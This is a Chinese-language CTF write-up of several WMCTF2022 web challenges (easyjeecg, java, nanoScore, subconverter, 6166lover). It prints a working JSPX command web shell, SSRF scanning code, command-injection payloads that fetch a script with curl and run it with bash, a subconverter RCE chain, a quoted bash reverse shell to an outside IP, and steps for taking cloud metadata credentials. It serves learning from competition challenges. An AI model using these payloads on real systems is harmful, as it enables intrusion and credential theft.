Y0ng的博客
0%

WMCTF2022

发表于 分类于

image-20220824235136734

easyjeecg

jeecg的框架,后台的漏洞getshell都需要登录,找到一个绕过登录的文章 一次简单的Java代码审计

然后搜下源码发现除了文章所说的上传,其他地方都基本可以通过绕过登录然后进行上传。

image-20220821225424633

直接上传jsp访问为403状态,可能屏蔽jsp后缀,利用jspx进行绕过,顺便记录一下能被解析的文件扩展名列表:

jsp jspx jspf
asp asa cer aspx
php php php3 php4 pht
exe exee

上传

image-20220821224733407

传一个jspx的base64的马

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="2.0">
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.io.*"/>
<jsp:directive.page import="sun.misc.BASE64Decoder"/>
<jsp:scriptlet><![CDATA[
    String tmp = pageContext.getRequest().getParameter("str");
    if (tmp != null&&!"".equals(tmp)) {
    try{
        String str = new String((new BASE64Decoder()).decodeBuffer(tmp));
        Process p = Runtime.getRuntime().exec(str);
        InputStream in = p.getInputStream();
        BufferedReader br = new BufferedReader(new InputStreamReader(in,"GBK"));
        String brs = br.readLine();
        while(brs!=null){
            out.println(brs+"</br>");
            brs = br.readLine();
        }
        }catch(Exception ex){
            out.println(ex.toString());
        }
    }]]>
</jsp:scriptlet>
</jsp:root>

shell

image-20220821225155150

FLAG:WMCTF{e77782bb-019b-417c-9d92-bf7a687add50}

java

提供一个url,根据路由file这个参数,往本地文件读,SSRF上面走

image-20220821225904326

利用file协议可以读取目录,发现ROOT.war

image-20220821230349118

下载审计,url过滤了 ` 。

wp:列⽬录发现有k8s 就扫k8s pod 段的8080端⼝ (不懂k8s….)

from cgitb import text
import requests
session = requests.session()

for i in range(2,255):
	print(f"[*] {i}")
	url = "http://1.13.254.132:8080/file"
	cookies = {"JSESSIONID": "B3083DFA6A4C8F14308E988475819C3E"}
	headers = {
	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
	"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
	"Accept-Encoding": "gzip, deflate",
	"Content-Type": "application/x-www-formurlencoded",
	"Origin": "http://1.13.254.132:8080",
	"Connection": "close",
	"Referer":"http://1.13.254.132:8080/"
	}
	data = {"url": f"http://10.244.0.{i}:8080", "Vcode": "skpz"}
	try:
		s = session.post(url=url, headers=headers, cookies=cookies,data=data,timeout=0.5)
		if s.status_code == 200 and "spark://" in s.text:
			print(f"[!]{i}{s.text}")
	except:
		pass

spark命令注⼊ 反弹shell,bypass直接利用 ; 就行了

url=http://10.244.0.152:8080/?
doAs=%253Bcurl%2Bhttp%253A%252F%252F127.0.0.1/ > /tmp/1&Vcode=skpz

url=http://10.244.0.152:8080/?doAs=%253Bbash%2B/tmp/1&Vcode=skpz

nanoScore

注册用户,登录后扫描目录发现/users目录

image-20220823111058772

爆破Ha1c9on密码为123456,获得flag

FLAG:WMCTF{50c1@1_EnGinEER1n6:_NEVeR_GOnN@_91ve_y0u_Up}

subconverter

C++写的用于各种订阅格式之间进行转换的实用程序,项目地址:Release v0.7.2 · tindy2013/subconverter

这道题一开始我的方向是往模板注入走的,因为在项目介绍里看到了用到了C++的模板 inja,类似于jinja。所以不断地尝试构造文件,远程获取后造成模板注入,更多的是一种黑盒,那么最后也是没有做出来,话不多说,跟着wp来看一下其他师傅的一个思路。

题目用的flask处理请求,然后转发给后端的subconverter服务,给出了两个路由/version和/sub,附件pref.toml是项目的配置文件,而且允许的请求参数为三个:ALLOWED_ARGS = ["url","target","token"]

image-20220824150454298

dump项目源码审计,路由以及相对的函数,关于项目的鉴权是通过global.accessToken进行判定。跟踪token来源为pref.toml中的 api_access_token 来设置的。

image-20220824214037095

其他路由:

image-20220824192456971

任意文件读取

这里函数都看了一遍,最后一个存在文件相关函数 fetchFile

image-20220824211058819

本地文件存在就直接任意读取

image-20220824213200708

这样就能获取鉴权用的token了

image-20220824214705276

RCE

谷歌到subconverter 的 RCE ,CVE-2022-28927 Subconverter v0.7.2 未经授权的RCE,其中poc的关键点为

url=script:cache/c10dca9bf2e82a5ec6293ceba3cee6bc

全局搜索 script:addNodes 的局部函数 script_safe_runner 中,如果link以 script: 开头,通过 fileGet 获取link的内容,然后通过QuickJS引擎的eval函数去执行获取的内容。这里大概率能执行系统命令,前提是我们内容可控,并且此处需要鉴权。

image-20220824215623231

向上寻找addNodes看其link是否可控,发现总共有两个函数进行调用 surgeConfToClashsubconverter

第一处x参数通过 global.insertUrls 不好控制。

image-20220824222736171

第二处x参数通过argUrl获取

image-20220824222929162

通过url参数获取,即可控

image-20220824223002094

文件写入

在RCE步骤,fileGet函数就是读本地文件操作,并不能远程获取代码,怎样才能让我们vps上的恶意代码存留到服务器上。

image-20220824223559652

在任意文件读取中提到一个 fetchFile

image-20220824213200708

第二个else中的webGet可能就是远程获取文件用的,跟进一下isLink,判断这三个协议开头

image-20220824225413252

重点就是 webGet 了,通过远程请求内容,然后写入缓存中,缓存规则为 cache/md5(url),这样形成任意文件写入

image-20220824225840047

那么fetchFile的调用处相当的多,比如/convert、/sub加target参数等等

shell

上面三者组合一下,QuickJS的命令执行翻翻手册就OK了

//1.txt
std.popen('/app/readflag > /app/flag', 'r')
//1.读取pref.toml
/convert?url=pref.toml

//2.获取vps内容
/convert?url=http://127.0.0.1/1.txt

//3.计算cache
/sub?token=K5unAFg0wPO1j&target=clash&url=script:cache/c290fb8309721db5f8622eb278635c1a

//4.获取flag
/convert?url=flag

6166lover

wp:WMCTF 2022 部分 WRITEUP - 白帽酱の博客 (rce.moe)

WEB-6166lover:
1. Figure out that is a Rocket application and has Cargo.tml leaked.
2. Download it and find the application name "static-files" and download the binary.
3. Run it with debug mode or Write a example application by yourself to find out the route has been registered.
4. Figure out both of the debug route have done, one is js sandbox, the another one is python "sandbox". Just think them as a black box and test them.
5. Run python code to RCE.
6. ps -ef, You will find /flag has been deleted when the instance booted.
7. Use Alibabacloud metadata to get the host instance metadata, And a worker role on it. https://help.aliyun.com/document_detail/214777.html / /meta-data/ram/security-credentials/

8. Use metadata api to get the temp credentials. 
9. Use temp credentials to invoke api GetAuthorizationToken. https://help.aliyun.com/document_detail/72334.html
10. Pull image from alibabacloud image registry with username cr_temp_user  and authorizationToken as its password.
Image: registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover

You may know these from the challenge domain, I have deployed in hangzhou of alibabacloud k8s service(ACK). And know the author name is glzjin, and the challenge name 6166lover.
11. After pull it, just run it with docker run -it registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover bash, and you may get the flag on the image.

Thank you:)
Just get your reverse shell like that:
http://6166lover.cf8a086c34bdb47138be0b5d5b15b067a.cn-hangzhou.alicontainer.com:81/debug/wnihwi2h2i2j1no1_path_wj2mm?code=__import__('os').system('bash -c "bash -i >%26 /dev/tcp/137.220.194.119/2233 0>%261"')

And maybe you have to find out a way to fork your process that not jam this application because it's deployed on k8s with a health check.

补充

弄两篇k8s的文章,慢慢来学习

K8s安全入门学习扫盲贴

Kubernetes安全测试实践录

K8S云原生环境渗透学习 - 先知社区